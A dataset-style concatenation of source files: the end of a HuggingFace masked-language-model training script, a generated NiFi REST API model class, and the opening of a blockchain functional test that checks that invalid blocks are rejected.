DataCollatorForLanguageModeling,
HfArgumentParser,
Trainer,
TrainingArguments,
set_seed,
)
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from transformers.utils.versions import require_version
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.12.0")
require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/language-modeling/requirements.txt")
logger = logging.getLogger(__name__)
MODEL_CONFIG_CLASSES = list(MODEL_FOR_MASKED_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": "The model checkpoint for weights initialization."
"Don't set if you want to train a model from scratch."
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_overrides: Optional[str] = field(
default=None,
metadata={
"help": "Override some existing default config settings when a model is trained from scratch. Example: "
"n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
def __post_init__(self):
if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
raise ValueError(
"--config_overrides can't be used in combination with --config_name or --model_name_or_path"
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_name: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
validation_split_percentage: Optional[int] = field(
default=5,
metadata={
"help": "The percentage of the train set used as validation set in case there's no validation split"
},
)
max_seq_length: Optional[int] = field(
default=None,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated."
},
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
mlm_probability: float = field(
default=0.15, metadata={"help": "Ratio of tokens to mask for masked language modeling loss"}
)
line_by_line: bool = field(
default=False,
metadata={"help": "Whether distinct lines of text in the dataset are to be handled as distinct sequences."},
)
pad_to_max_length: bool = field(
default=False,
metadata={
"help": "Whether to pad all samples to `max_seq_length`. "
"If False, will pad the samples dynamically when batching to the maximum length in the batch."
},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
def __post_init__(self):
if self.dataset_name is None and self.train_file is None and self.validation_file is None:
raise ValueError("Need either a dataset name or a training/validation file.")
else:
if self.train_file is not None:
extension = self.train_file.split(".")[-1]
if extension not in ["csv", "json", "txt"]:
raise ValueError("`train_file` should be a csv, a json or a txt file.")
if self.validation_file is not None:
extension = self.validation_file.split(".")[-1]
if extension not in ["csv", "json", "txt"]:
raise ValueError("`validation_file` should be a csv, a json or a txt file.")
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
# Set the verbosity to info of the Transformers logger (on main process only):
logger.info(f"Training/evaluation parameters {training_args}")
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
# Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below)
# or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/
# (the dataset will be downloaded automatically from the datasets Hub
#
# For CSV/JSON files, this script will use the column called 'text' or the first column. You can easily tweak this
# behavior (see below)
#
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
if data_args.dataset_name is not None:
# Downloading and loading a dataset from the hub.
raw_datasets = load_dataset(
data_args.dataset_name, data_args.dataset_config_name, cache_dir=model_args.cache_dir
)
if "validation" not in raw_datasets.keys():
raw_datasets["validation"] = load_dataset(
data_args.dataset_name,
data_args.dataset_config_name,
split=f"train[:{data_args.validation_split_percentage}%]",
cache_dir=model_args.cache_dir,
)
raw_datasets["train"] = load_dataset(
data_args.dataset_name,
data_args.dataset_config_name,
split=f"train[{data_args.validation_split_percentage}%:]",
cache_dir=model_args.cache_dir,
)
else:
data_files = {}
if data_args.train_file is not None:
data_files["train"] = data_args.train_file
extension = data_args.train_file.split(".")[-1]
if data_args.validation_file is not None:
data_files["validation"] = data_args.validation_file
extension = data_args.validation_file.split(".")[-1]
if extension == "txt":
extension = "text"
raw_datasets = load_dataset(extension, data_files=data_files, cache_dir=model_args.cache_dir)
# If no validation data is there, validation_split_percentage will be used to divide the dataset.
if "validation" not in raw_datasets.keys():
raw_datasets["validation"] = load_dataset(
extension,
data_files=data_files,
split=f"train[:{data_args.validation_split_percentage}%]",
cache_dir=model_args.cache_dir,
)
raw_datasets["train"] = load_dataset(
extension,
data_files=data_files,
split=f"train[{data_args.validation_split_percentage}%:]",
cache_dir=model_args.cache_dir,
)
# See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# Load pretrained model and tokenizer
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config_kwargs = {
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.config_overrides is not None:
logger.info(f"Overriding config: {model_args.config_overrides}")
config.update_from_string(model_args.config_overrides)
tokenizer_kwargs = {
"cache_dir": model_args.cache_dir,
"use_fast": model_args.use_fast_tokenizer,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs)
elif model_args.model_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **tokenizer_kwargs)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
if model_args.model_name_or_path:
model = AutoModelForMaskedLM.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
else:
logger.info("Training new model from scratch")
model = AutoModelForMaskedLM.from_config(config)
model.resize_token_embeddings(len(tokenizer))
# Preprocessing the datasets.
# First we tokenize all the texts.
if training_args.do_train:
column_names = raw_datasets["train"].column_names
else:
column_names = raw_datasets["validation"].column_names
text_column_name = "text" if "text" in column_names else column_names[0]
if data_args.max_seq_length is None:
max_seq_length = tokenizer.model_max_length
if max_seq_length > 1024:
logger.warning(
f"The tokenizer picked seems to have a very large `model_max_length` ({tokenizer.model_max_length}). "
"Picking 1024 instead. You can change that default value by passing --max_seq_length xxx."
)
max_seq_length = 1024
else:
if data_args.max_seq_length > tokenizer.model_max_length:
logger.warning(
f"The max_seq_length passed ({data_args.max_seq_length}) is larger than the maximum length for the"
f"model ({tokenizer.model_max_length}). Using max_seq_length={tokenizer.model_max_length}."
)
max_seq_length = min(data_args.max_seq_length, tokenizer.model_max_length)
if data_args.line_by_line:
# When using line_by_line, we just tokenize each nonempty line.
padding = "max_length" if data_args.pad_to_max_length else False
def tokenize_function(examples):
# Remove empty lines
examples[text_column_name] = [
line for line in examples[text_column_name] if len(line) > 0 and not line.isspace()
]
return tokenizer(
examples[text_column_name],
padding=padding,
truncation=True,
max_length=max_seq_length,
# We use this option because DataCollatorForLanguageModeling (see below) is more efficient when it
# receives the `special_tokens_mask`.
return_special_tokens_mask=True,
)
with training_args.main_process_first(desc="dataset map tokenization"):
tokenized_datasets = raw_datasets.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=[text_column_name],
load_from_cache_file=not data_args.overwrite_cache,
desc="Running tokenizer on dataset line_by_line",
)
else:
# Otherwise, we tokenize every text, then concatenate them together before splitting them in smaller parts.
# We use `return_special_tokens_mask=True` because DataCollatorForLanguageModeling (see below) is more
# efficient when it receives the `special_tokens_mask`.
def tokenize_function(examples):
return tokenizer(examples[text_column_name], return_special_tokens_mask=True)
with training_args.main_process_first(desc="dataset map tokenization"):
tokenized_datasets = raw_datasets.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=column_names,
load_from_cache_file=not data_args.overwrite_cache,
desc="Running tokenizer on every text in dataset",
)
# Main data processing function that will concatenate all texts from our dataset and generate chunks of
# max_seq_length.
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: sum(examples[k], []) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
# We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
# customize this part to your needs.
if total_length >= max_seq_length:
total_length = (total_length // max_seq_length) * max_seq_length
# Split by chunks of max_len.
result = {
k: [t[i : i + max_seq_length] for i in range(0, total_length, max_seq_length)]
for k, t in concatenated_examples.items()
}
return result
# Note that with `batched=True`, this map processes 1,000 texts together, so group_texts throws away a
# remainder for each of those groups of 1,000 texts. You can adjust that batch_size here but a higher value
# might be slower to preprocess.
#
# To speed up this part, we use multiprocessing. See the documentation of the map method for more information:
# https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.map
with training_args.main_process_first(desc="grouping texts together"):
tokenized_datasets = tokenized_datasets.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=not data_args.overwrite_cache,
desc=f"Grouping texts in chunks of {max_seq_length}",
)
if training_args.do_train:
if "train" not in tokenized_datasets:
raise ValueError("--do_train requires a train dataset")
train_dataset = tokenized_datasets["train"]
if data_args.max_train_samples is not None:
train_dataset = train_dataset.select(range(data_args.max_train_samples))
if training_args.do_eval:
if "validation" not in tokenized_datasets:
raise ValueError("--do_eval requires a validation dataset")
eval_dataset = tokenized_datasets["validation"]
if data_args.max_eval_samples is not None:
eval_dataset = eval_dataset.select(range(data_args.max_eval_samples))
# Data collator
# This one will take care of randomly masking the tokens.
pad_to_multiple_of_8 = data_args.line_by_line and training_args.fp16 and not data_args.pad_to_max_length
data_collator = DataCollatorForLanguageModeling(
tokenizer=tokenizer,
mlm_probability=data_args.mlm_probability,
pad_to_multiple_of=8 if pad_to_multiple_of_8 else None,
)
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
tokenizer=tokenizer,
data_collator=data_collator,
)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
trainer.save_model() # Saves the tokenizer too for easy upload
metrics = train_result.metrics
max_train_samples = (
data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset)
)
metrics["train_samples"] = min(max_train_samples, len(train_dataset))
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate()
max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset)
metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset))
try:
perplexity = math.exp(metrics["eval_loss"])
except OverflowError:
perplexity = float("inf")
metrics["perplexity"] = perplexity
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
kwargs = {"finetuned_from": model_args.model_name_or_path, "tasks": "fill-mask"}
if data_args.dataset_name is not None:
kwargs["dataset_tags"] = data_args.dataset_name
if data_args.dataset_config_name is not None:
kwargs["dataset_args"] = data_args.dataset_config_name
kwargs["dataset"] = f"{data_args.dataset_name} {data_args.dataset_config_name}"
else:
kwargs["dataset"] = data_args.dataset_name
if training_args.push_to_hub:
trainer.push_to_hub(**kwargs)
else:
trainer.create_model_card(**kwargs)
def _mp_fn(index):
# For xla_spawn (TPUs)
main()
if __name__ == "__main__":
main()
| 43.562162 | 119 | 0.667783 |
d0347cc0f904769260deaaf47c29c9bd6df1f67c | 3,541 | py | Python | nipyapi/nifi/models/drop_request_entity.py | iMajna/nipyapi | 5480af8fe8c6b470249837835cb1a067abb6678e | [
"Apache-2.0"
] | null | null | null | nipyapi/nifi/models/drop_request_entity.py | iMajna/nipyapi | 5480af8fe8c6b470249837835cb1a067abb6678e | [
"Apache-2.0"
] | 1 | 2020-03-16T10:02:46.000Z | 2020-03-16T13:37:42.000Z | nipyapi/nifi/models/drop_request_entity.py | iMajna/nipyapi | 5480af8fe8c6b470249837835cb1a067abb6678e | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.12.1
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class DropRequestEntity(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'drop_request': 'DropRequestDTO'
}
attribute_map = {
'drop_request': 'dropRequest'
}
def __init__(self, drop_request=None):
"""
DropRequestEntity - a model defined in Swagger
"""
self._drop_request = None
if drop_request is not None:
self.drop_request = drop_request
@property
def drop_request(self):
"""
Gets the drop_request of this DropRequestEntity.
:return: The drop_request of this DropRequestEntity.
:rtype: DropRequestDTO
"""
return self._drop_request
@drop_request.setter
def drop_request(self, drop_request):
"""
Sets the drop_request of this DropRequestEntity.
:param drop_request: The drop_request of this DropRequestEntity.
:type: DropRequestDTO
"""
self._drop_request = drop_request
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, DropRequestEntity):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 28.556452 | 479 | 0.556622 |
0e7c9f3574619d899ba3d12f44f8c3a9ea0c8558 | 64,044 | py | Python | test/functional/feature_block.py | LOUD-Mining/WhatCoin | 867630c222dfc7643fe13c1ec69ae187210f157d | [
"MIT"
] | null | null | null | test/functional/feature_block.py | LOUD-Mining/WhatCoin | 867630c222dfc7643fe13c1ec69ae187210f157d | [
"MIT"
] | null | null | null | test/functional/feature_block.py | LOUD-Mining/WhatCoin | 867630c222dfc7643fe13c1ec69ae187210f157d | [
"MIT"
] | 1 | 2021-04-22T05:44:57.000Z | 2021-04-22T05:44:57.000Z | #!/usr/bin/env python3
# Copyright (c) 2015-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test block processing."""
import copy
import struct
import time
from test_framework.blocktools import (
create_block,
create_coinbase,
create_tx_with_script,
get_legacy_sigopcount_block,
MAX_BLOCK_SIGOPS,
)
from test_framework.key import ECKey
from test_framework.messages import (
CBlock,
COIN,
COutPoint,
CTransaction,
CTxIn,
CTxOut,
MAX_BLOCK_BASE_SIZE,
uint256_from_compact,
uint256_from_str,
)
from test_framework.mininode import P2PDataStore
from test_framework.script import (
CScript,
MAX_SCRIPT_ELEMENT_SIZE,
OP_2DUP,
OP_CHECKMULTISIG,
OP_CHECKMULTISIGVERIFY,
OP_CHECKSIG,
OP_CHECKSIGVERIFY,
OP_ELSE,
OP_ENDIF,
OP_EQUAL,
OP_DROP,
OP_FALSE,
OP_HASH160,
OP_IF,
OP_INVALIDOPCODE,
OP_RETURN,
OP_TRUE,
SIGHASH_ALL,
SignatureHash,
hash160,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
from data import invalid_txs
from test_framework.runebaseconfig import *
# Use this class for tests that require behavior other than normal "mininode" behavior.
# For now, it is used to serialize a bloated varint (b64).
class CBrokenBlock(CBlock):
def initialize(self, base_block):
self.vtx = copy.deepcopy(base_block.vtx)
self.hashMerkleRoot = self.calc_merkle_root()
def serialize(self, with_witness=False):
r = b""
r += super(CBlock, self).serialize()
r += struct.pack("<BQ", 255, len(self.vtx))
for tx in self.vtx:
if with_witness:
r += tx.serialize_with_witness()
else:
r += tx.serialize_without_witness()
return r
def normal_serialize(self):
return super().serialize()
class FullBlockTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [[]]
def run_test(self):
node = self.nodes[0] # convenience reference to the node
self.bootstrap_p2p() # Add one p2p connection to the node
self.block_heights = {}
self.coinbase_key = ECKey()
self.coinbase_key.generate()
self.coinbase_pubkey = self.coinbase_key.get_pubkey().get_bytes()
self.tip = None
self.blocks = {}
self.genesis_hash = int(self.nodes[0].getbestblockhash(), 16)
self.block_heights[self.genesis_hash] = 0
self.spendable_outputs = []
# Create a new block
b0 = self.next_block(0)
self.save_spendable_output()
self.sync_blocks([b0])
# These constants chosen specifically to trigger an immature coinbase spend
# at a certain time below.
NUM_BUFFER_BLOCKS_TO_GENERATE = 98-15+COINBASE_MATURITY
NUM_OUTPUTS_TO_COLLECT = 99
# Allow the block to mature
blocks = []
# Now we need that block to mature so we can spend the coinbase.
for i in range(NUM_BUFFER_BLOCKS_TO_GENERATE):
blocks.append(self.next_block("maturitybuffer.{}".format(i)))
self.save_spendable_output()
self.sync_blocks(blocks)
# collect spendable outputs now to avoid cluttering the code later on
out = []
for i in range(NUM_OUTPUTS_TO_COLLECT):
out.append(self.get_spendable_output())
# Start by building a couple of blocks on top (which output is spent is
# in parentheses):
# genesis -> b1 (0) -> b2 (1)
b1 = self.next_block(1, spend=out[0])
self.save_spendable_output()
b2 = self.next_block(2, spend=out[1])
self.save_spendable_output()
self.sync_blocks([b1, b2], timeout=4)
# Select a txn with an output eligible for spending. This won't actually be spent,
# since we're testing submission of a series of blocks with invalid txns.
attempt_spend_tx = out[2]
# Submit blocks for rejection, each of which contains a single transaction
# (aside from coinbase) which should be considered invalid.
for TxTemplate in invalid_txs.iter_all_templates():
template = TxTemplate(spend_tx=attempt_spend_tx)
if template.valid_in_block:
continue
self.log.info("Reject block with invalid tx: %s", TxTemplate.__name__)
blockname = "for_invalid.%s" % TxTemplate.__name__
badblock = self.next_block(blockname)
badtx = template.get_tx()
if TxTemplate != invalid_txs.InputMissing:
self.sign_tx(badtx, attempt_spend_tx)
badtx.rehash()
badblock = self.update_block(blockname, [badtx])
self.sync_blocks(
[badblock], success=False,
reject_reason=(template.block_reject_reason or template.reject_reason),
reconnect=True, timeout=2)
self.move_tip(2)
# Fork like this:
#
# genesis -> b1 (0) -> b2 (1)
# \-> b3 (1)
#
# Nothing should happen at this point. We saw b2 first so it takes priority.
self.log.info("Don't reorg to a chain of the same length")
self.move_tip(1)
b3 = self.next_block(3, spend=out[1])
txout_b3 = b3.vtx[1]
self.sync_blocks([b3], False)
# Now we add another block to make the alternative chain longer.
#
# genesis -> b1 (0) -> b2 (1)
# \-> b3 (1) -> b4 (2)
self.log.info("Reorg to a longer chain")
b4 = self.next_block(4, spend=out[2])
self.sync_blocks([b4])
# ... and back to the first chain.
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b3 (1) -> b4 (2)
self.move_tip(2)
b5 = self.next_block(5, spend=out[2])
self.save_spendable_output()
self.sync_blocks([b5], False)
self.log.info("Reorg back to the original chain")
b6 = self.next_block(6, spend=out[3])
self.sync_blocks([b6], True)
# Try to create a fork that double-spends
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b7 (2) -> b8 (4)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a chain with a double spend, even if it is longer")
self.move_tip(5)
b7 = self.next_block(7, spend=out[2])
self.sync_blocks([b7], False)
b8 = self.next_block(8, spend=out[4])
self.sync_blocks([b8], False, reconnect=True)
# Try to create a block that has too much fee
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b9 (4)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block where the miner creates too much coinbase reward")
self.move_tip(6)
b9 = self.next_block(9, spend=out[4], additional_coinbase_value=1)
self.sync_blocks([b9], success=False, reconnect=True)
# Create a fork that ends in a block with too much fee (the one that causes the reorg)
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b10 (3) -> b11 (4)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer")
self.move_tip(5)
b10 = self.next_block(10, spend=out[3])
self.sync_blocks([b10], False)
b11 = self.next_block(11, spend=out[4], additional_coinbase_value=1)
self.sync_blocks([b11], success=False, reconnect=True)
# Try again, but with a valid fork first
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b14 (5)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer (on a forked chain)")
self.move_tip(5)
b12 = self.next_block(12, spend=out[3])
self.save_spendable_output()
b13 = self.next_block(13, spend=out[4])
self.save_spendable_output()
b14 = self.next_block(14, spend=out[5], additional_coinbase_value=1)
self.sync_blocks([b12, b13, b14], success=False, reconnect=True)
# New tip should be b13.
assert_equal(node.getbestblockhash(), b13.hash)
# Add a block with MAX_BLOCK_SIGOPS and one with one more sigop
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b16 (6)
# \-> b3 (1) -> b4 (2)
self.log.info("Accept a block with lots of checksigs")
lots_of_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS - 1))
self.move_tip(13)
b15 = self.next_block(15, spend=out[5], script=lots_of_checksigs)
self.save_spendable_output()
self.sync_blocks([b15], True)
self.log.info("Reject a block with too many checksigs")
too_many_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS))
b16 = self.next_block(16, spend=out[6], script=too_many_checksigs)
self.sync_blocks([b16], success=False, reject_reason='bad-blk-sigops', reconnect=True)
# Attempt to spend a transaction created on a different fork
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b17 (b3.vtx[1])
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block with a spend from a re-org'ed out tx")
self.move_tip(15)
b17 = self.next_block(17, spend=txout_b3)
self.sync_blocks([b17], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# Attempt to spend a transaction created on a different fork (on a fork this time)
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5)
# \-> b18 (b3.vtx[1]) -> b19 (6)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block with a spend from a re-org'ed out tx (on a forked chain)")
self.move_tip(13)
b18 = self.next_block(18, spend=txout_b3)
self.sync_blocks([b18], False)
b19 = self.next_block(19, spend=out[6])
self.sync_blocks([b19], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# Attempt to spend a coinbase at depth too low
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b20 (7)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block spending an immature coinbase.")
self.move_tip(15)
b20 = self.next_block(20, spend=out[98])
self.sync_blocks([b20], success=False, reject_reason='bad-txns-premature-spend-of-coinbase')
# Attempt to spend a coinbase at depth too low (on a fork this time)
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5)
# \-> b21 (6) -> b22 (5)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block spending an immature coinbase (on a forked chain)")
self.move_tip(13)
b21 = self.next_block(21, spend=out[6])
self.sync_blocks([b21], False)
b22 = self.next_block(22, spend=out[96])
self.sync_blocks([b22], success=False, reject_reason='bad-txns-premature-spend-of-coinbase')
# Create a block on either side of MAX_BLOCK_BASE_SIZE and make sure its accepted/rejected
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6)
# \-> b24 (6) -> b25 (7)
# \-> b3 (1) -> b4 (2)
self.log.info("Accept a block of size MAX_BLOCK_BASE_SIZE")
self.move_tip(15)
b23 = self.next_block(23, spend=out[6])
tx = CTransaction()
script_length = 1000000 - len(b23.serialize()) - 69
script_output = CScript([b'\x00' * script_length])
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(CTxIn(COutPoint(b23.vtx[1].sha256, 0)))
b23 = self.update_block(23, [tx])
# Make sure the math above worked out to produce a max-sized block
assert_equal(len(b23.serialize()), 1000000)
self.sync_blocks([b23], True)
self.save_spendable_output()
self.log.info("Reject a block of size MAX_BLOCK_BASE_SIZE + 1")
self.move_tip(15)
b24 = self.next_block(24, spend=out[6])
script_length = MAX_BLOCK_BASE_SIZE - len(b24.serialize()) - 69
script_output = CScript([b'\x00' * (script_length + 1)])
tx.vout = [CTxOut(0, script_output)]
b24 = self.update_block(24, [tx])
assert_equal(len(b24.serialize()), MAX_BLOCK_BASE_SIZE + 1)
self.sync_blocks([b24], success=False, reconnect=True)
b25 = self.next_block(25, spend=out[7])
self.sync_blocks([b25], False)
# Create blocks with a coinbase input script size out of range
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7)
# \-> ... (6) -> ... (7)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block with coinbase input script size out of range")
self.move_tip(15)
b26 = self.next_block(26, spend=out[6])
b26.vtx[0].vin[0].scriptSig = b'\x00'
b26.vtx[0].rehash()
# update_block causes the merkle root to get updated, even with no new
# transactions, and updates the required state.
b26 = self.update_block(26, [])
self.sync_blocks([b26], success=False, reject_reason='bad-cb-length', reconnect=True)
